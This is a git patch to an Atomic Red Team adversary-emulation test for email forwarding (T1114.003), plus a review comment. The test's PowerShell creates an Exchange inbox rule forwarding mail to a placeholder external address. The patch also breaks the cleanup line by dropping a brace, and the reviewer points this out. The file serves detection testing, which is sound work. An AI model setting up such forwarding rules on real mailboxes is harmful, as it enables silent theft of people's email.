From c09c0afbd9e0eb074cbbc95c0a4ae81a57e39d29 Mon Sep 17 00:00:00 2001
From: Justin Schoenfeld
Date: Wed, 4 Jan 2023 16:44:01 -0500
Subject: [PATCH] Update T1114.003.yaml
---
 atomics/T1114.003/T1114.003.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/atomics/T1114.003/T1114.003.yaml b/atomics/T1114.003/T1114.003.yaml
index 7d70eb6f..d7294371 100644
--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -9,11 +9,11 @@ atomic_tests:
 - office-365
 input_arguments:
 username:
- description: office 365 username
+ description: office-365 username
 type: String
 default: null
 password:
- description: office 365 password
+ description: office-365 password
 type: String
 default: null
 rule_name:
@@ -36,11 +36,11 @@ atomic_tests:
 $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
 Connect-ExchangeOnline -Credential $creds
- New-InboxRule -Name "#{rule_name}-" -ForwardTo 'Atomic_Operator@example.com'
+ New-InboxRule -Name "#{rule_name}" -ForwardTo 'Atomic_Operator@example.com'
 cleanup_command: |
 $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
 Connect-ExchangeOnline -Credential $creds
- Get-InboxRule | Where-Object { $_.Name -eq 'Atomic Red Team Email Rule' } | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
+ Get-InboxRule | Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
 name: powershell
 elevation_required: false
\ No newline at end of file
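Review bot: The rewritten `Get-InboxRule` line in `cleanup_command` (second hunk) loses the closing brace of the `Where-Object` script block, so the braces no longer balance and PowerShell should reject the line before any rule is removed. A cleanup that fails to parse leaves the forwarding rule to the external address active on the test mailbox after the test run. The filter should read `Where-Object { $_.Name -eq "#{rule_name}" } | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }`. Because `#{rule_name}` now sits inside double quotes in both the create and cleanup lines, a rule name containing `$` or a backtick would presumably be expanded by PowerShell; single quotes would keep the comparison literal. The enclosing atomic test definition starts and ends outside the hunk.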